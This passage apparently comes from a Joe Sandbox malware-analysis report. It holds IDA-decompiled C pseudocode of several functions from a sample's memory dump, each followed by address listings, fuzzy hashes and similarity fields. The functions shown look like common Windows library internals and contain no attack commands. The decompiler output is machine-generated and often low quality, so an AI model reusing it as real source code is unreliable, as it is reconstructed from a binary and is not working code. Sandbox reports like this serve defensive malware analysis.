					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01796B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01796B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01737D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01759AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return L0175B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01734620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x01797016
0x0179701e
0x0179702b
0x01797033
0x01797037
0x0179703c
0x0179703e
0x01797041
0x01797045
0x0179704a
0x01797050
0x01797055
0x0179705a
0x01797062
0x01797062
0x0179705a
0x01797064
0x01797064
0x01797067
0x01797071
0x01797096
0x0179709b
0x017970a2
0x017970a6
0x017970a7
0x017970ad
0x017970b3
0x017970b6
0x017970bb
0x017970c3
0x017970c3
0x017970c6
0x017970cd
0x017970dd
0x017970e0
0x017970e2
0x017970e2
0x017970ee
0x01797101
0x017970f0
0x017970f9
0x017970f9
0x0179710a
0x0179710e
0x01797112
0x01797117
0x01797118
0x01797118
0x017970bb
0x0179711d
0x01797123
0x01797131
0x01797131
0x01797136
0x0179713d
0x0179713e
0x0179713f
0x0179714a
0x0179714a
0x01797084
0x01797088
0x00000000
0x0179708e
0x0179708e
0x01797092
0x00000000
0x01797092

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50db6c35ea72beebf843ce625a3e2c743fa170401bfa7d4de72b5e58e3564a8f
Instruction ID: 6949ee233f0daf10afcfe792b68cdfd4668f5c43feec3554f920a2dfa110a137
Opcode Fuzzy Hash: 50db6c35ea72beebf843ce625a3e2c743fa170401bfa7d4de72b5e58e3564a8f
Instruction Fuzzy Hash: 5C31E4B26047419BC728DF2CD844A6AF7E5FFC8700F044A29F99587690E730E908CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 017461A0 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E017461A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = L01745E50(0x16f67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E017E9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						L0171F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x017461b3
0x017461b5
0x017461bd
0x017461c3
0x017461c7
0x017461d2
0x017461ff
0x017461ff
0x01746201
0x01746207
0x01746207
0x017461d4
0x017461d9
0x00000000
0x00000000
0x017461df
0x017461e2
0x00000000
0x00000000
0x017461e6
0x017461e8
0x017461ee
0x017461ee
0x017461f9
0x0178762f
0x01787632
0x01787635
0x01787639
0x01787640
0x0178766e
0x01787675
0x00000000
0x00000000
0x01787681
0x01787689
0x0178768d
0x01787691
0x01787695
0x01787699
0x017876af
0x017876b5
0x017876b7
0x017876b7
0x017876d7
0x017876dc
0x00000000
0x017876dc
0x017876a2
0x017876a9
0x01787651
0x01787653
0x01787653
0x01787656
0x01787656
0x00000000
0x01787656
0x01787644
0x01787646
0x01787648
0x01787648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb3a9d97bce06cdd0b45c8f4289c3c312429eb12d088d4cd337c7c14fb5d8f3
Instruction ID: 50b7d61e4ee9b3bbc9eb5064700cb645ea002d0d827ad6717528352f502ecde0
Opcode Fuzzy Hash: 0eb3a9d97bce06cdd0b45c8f4289c3c312429eb12d088d4cd337c7c14fb5d8f3
Instruction Fuzzy Hash: 053169716093018FE324DF1DC800B26FBE4FB88B04F15496DFA999B251E7B0E804CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0171AA16 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0171AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x180d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1807b9c; // 0x0
					_t53 = L01734620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return L0175B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0175F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01726C59(_t53, _t51, _t58) != 0) {
							_t28 = L01745E50(0x16fc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0174B230(_v32, _v28, 0x16fc2d8, 1,  &_v24);
								_t28 = L0171F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x0171aa25
0x0171aa29
0x0171aa2d
0x0171aa30
0x0171aa37
0x0171aa3c
0x01774458
0x01774458
0x01774472
0x01774474
0x01774476
0x0171aa64
0x0171aa74
0x0177447c
0x01774483
0x01774492
0x0171aa52
0x0171aa54
0x0171aa5e
0x017744a8
0x017744ad
0x017744af
0x017744b6
0x017744b6
0x017744b9
0x017744bc
0x017744cd
0x017744d3
0x017744d6
0x017744e1
0x017744e1
0x017744e6
0x017744e8
0x017744fb
0x017744fb
0x017744e8
0x00000000
0x0171aa5e
0x01774476
0x0171aa42
0x0171aa46
0x0171aa48
0x0171aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e2bebf9ebacf2e04b622e6cce2dd444ec51bdac3f068201751d975c40c6a8d2
Instruction ID: 583c9571bf91c9e826a4f45c8ac63d933a01d45f6e2c2b10289531ef82b91f27
Opcode Fuzzy Hash: 7e2bebf9ebacf2e04b622e6cce2dd444ec51bdac3f068201751d975c40c6a8d2
Instruction Fuzzy Hash: 5731D572A0122AABCF159FA8CD81A7FF7B9EF44700F014069F906E7254E7749E11DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01754A2C Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E01754A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x180d360 ^ _t62;
				_v8 =  *0x180d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01732280(_t26, 0x1808608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						L0172FFB0(_t41, _t51, 0x1808608);
						L2:
						 *0x180b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return L0175B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01732280(_t28, 0x1808608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							L0172FFB0(_t42, _t53, 0x1808608);
							if(_t53 != 0) {
								L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						L0172FFB0(_t41, _t51, 0x1808608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x01754a2c
0x01754a34
0x01754a3c
0x01754a3e
0x01754a48
0x01754a4b
0x01754a4d
0x01754a51
0x01754a9c
0x00000000
0x00000000
0x01754aa3
0x01754aa8
0x01754aad
0x01754ab1
0x01754ade
0x01754ae3
0x01754a5a
0x01754a62
0x01754a6a
0x01754a6e
0x0178f203
0x01754a84
0x01754a88
0x01754a89
0x01754a8a
0x01754a95
0x01754a95
0x01754a79
0x01754a80
0x01754af2
0x01754af4
0x01754af9
0x01754aff
0x01754b01
0x01754b03
0x01754b08
0x0178f20a
0x0178f212
0x0178f216
0x0178f216
0x01754b08
0x01754b13
0x01754b1a
0x0178f229
0x0178f229
0x01754b1a
0x01754a82
0x00000000
0x01754a82
0x01754ab7
0x01754acd
0x01754acd
0x01754ad5
0x01754ada
0x00000000
0x01754ada
0x01754ac2
0x01754acb
0x00000000
0x00000000
0x00000000
0x01754acb
0x01754a53
0x01754a53
0x01754a58
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8169ad61bf29660e9f3594b2cc32212b3b7856e0bf3adf404edc524a904e29d2
Instruction ID: 54864301c2c130f77dd401557a0155e17a6f951651201bef5fd2f0b4cf0bcd6b
Opcode Fuzzy Hash: 8169ad61bf29660e9f3594b2cc32212b3b7856e0bf3adf404edc524a904e29d2
Instruction Fuzzy Hash: 343132326053559BD7E2AF18CD88B2BFBA4FFC5B00F010569E82647245EBB0DA80CB85

Uniqueness

Uniqueness Score: -1.00%

Function 01719100 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01719100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x17ef6e8);
				E0176D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E017E88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0176D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x18086c0; // 0x14507b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x18086b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01732280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E017E88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							L0175AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x180b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x18084c0;
										if(_t69 >=  *0x18084c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E017E9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0171922A(_t82);
							_t53 = E01737D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E017E8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x18086c0; // 0x14507b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x18086b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x18086bc;
										_t72 = 0x18086b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01719240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x18086c4;
									_t72 = 0x18086c0;
									L18:
									E01749B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x01719100
0x01719100
0x01719100
0x01719100
0x01719102
0x01719107
0x0171910c
0x01719110
0x01719115
0x01719136
0x01719143
0x017737e4
0x017737e4
0x01719149
0x0171914e
0x0171914e
0x01719117
0x0171911d
0x00000000
0x00000000
0x0171911f
0x01719125
0x00000000
0x01719151
0x01719158
0x0171915d
0x01719161
0x01719168
0x01773715
0x00000000
0x0171916e
0x0171916e
0x01719175
0x01719177
0x0171917e
0x0171917f
0x01719182
0x01719182
0x01719187
0x01719187
0x0171918a
0x0171918d
0x0171918f
0x01719192
0x01719195
0x01719198
0x01719198
0x01719198
0x0171919a
0x00000000
0x00000000
0x0177371f
0x01773721
0x01773727
0x0177372f
0x01773733
0x01773735
0x01773738
0x0177373b
0x0177373d
0x01773740
0x00000000
0x00000000
0x01773746
0x01773749
0x00000000
0x00000000
0x0177374f
0x01773751
0x00000000
0x00000000
0x01773757
0x01773759
0x0177375c
0x0177375c
0x0177375e
0x0177375e
0x01773761
0x01773764
0x00000000
0x00000000
0x01773766
0x01773768
0x017737a3
0x017737a3
0x017737a5
0x017737a7
0x017737ad
0x017737b0
0x017737b2
0x017737bc
0x017737c2
0x017737c2
0x017737b2
0x01719187
0x01719187
0x0171918a
0x0171918d
0x0171918f
0x01719192
0x01719195
0x00000000
0x01719195
0x00000000
0x01719187
0x0177376a
0x0177376a
0x0177376c
0x0177376c
0x0177376f
0x01773775
0x00000000
0x00000000
0x01773777
0x01773779
0x00000000
0x00000000
0x01773782
0x01773787
0x01773789
0x01773790
0x01773790
0x0177378b
0x0177378b
0x0177378b
0x01773792
0x01773795
0x01773795
0x01773798
0x01773798
0x0177379b
0x0177379b
0x017191a3
0x017191a9
0x017191b0
0x017191b4
0x017191b4
0x017191bb
0x017191c0
0x017191c5
0x017191c7
0x017737da
0x017191cd
0x017191cd
0x017191cd
0x017191d2
0x017191d5
0x01719239
0x01719239
0x017191d7
0x017191db
0x017191e1
0x017191e7
0x017191fd
0x01719203
0x0171921e
0x01719223
0x00000000
0x01719223
0x01719205
0x01719208
0x0171920c
0x01719214
0x01719214
0x017191e9
0x017191e9
0x017191ee
0x017191f3
0x017191f3
0x017191f3
0x017191e7
0x00000000
0x017191db
0x01719187
0x01719168

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfb18048ea645f9607c3d48136469b00e515a6da034528ee0e75f67700fd2db9
Instruction ID: 2df3aaafd1d3dd3769848b4b3641bb9ab08ca889f9ab783880fef5904a49b2d3
Opcode Fuzzy Hash: bfb18048ea645f9607c3d48136469b00e515a6da034528ee0e75f67700fd2db9
Instruction Fuzzy Hash: 0431D471A01245DFDB26DB6CC49C7ACFBF1BB49318F15815DC61467249C330AAC1DB52

Uniqueness

Uniqueness Score: -1.00%

Function 01730050 Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E01730050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x180d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				L01749ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return L0175B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E017E8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = L01749702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x180b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x01730055
0x0173005d
0x01730062
0x0173006c
0x0173006f
0x01730074
0x0173007a
0x0173007a
0x01730080
0x01730080
0x01730087
0x0173008d
0x0173008f
0x01730093
0x01730095
0x0173009b
0x017300f8
0x017300fb
0x017300fc
0x017300ff
0x01730108
0x01730108
0x017300a2
0x017300a6
0x017300b3
0x017300bc
0x017300c5
0x017300ca
0x0177c01e
0x00000000
0x00000000
0x0177c02d
0x017300d5
0x017300d9
0x0177c03d
0x0177c046
0x0177c046
0x017300df
0x017300e2
0x017300ea
0x017300ef
0x017300f2
0x017300f6
0x01730111
0x01730117
0x01730117
0x00000000
0x017300f6
0x017300d0
0x017300d0
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d8ac152fdcac471f4ad97ecbec75fe9c93cfcaff3d27ff0fb9938afbeec0a9e
Instruction ID: cfe2f09851476919e254b5ae3402e6628c35c782b104d2b3b2996b83b3c42d79
Opcode Fuzzy Hash: 0d8ac152fdcac471f4ad97ecbec75fe9c93cfcaff3d27ff0fb9938afbeec0a9e
Instruction Fuzzy Hash: C431CE31201B05CFD722CF28C984B9AF3E5FF89714F1445ADE59687B91EB71A801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 017590AF Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E017590AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(L0176D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0174E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01734620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0175F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0174A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
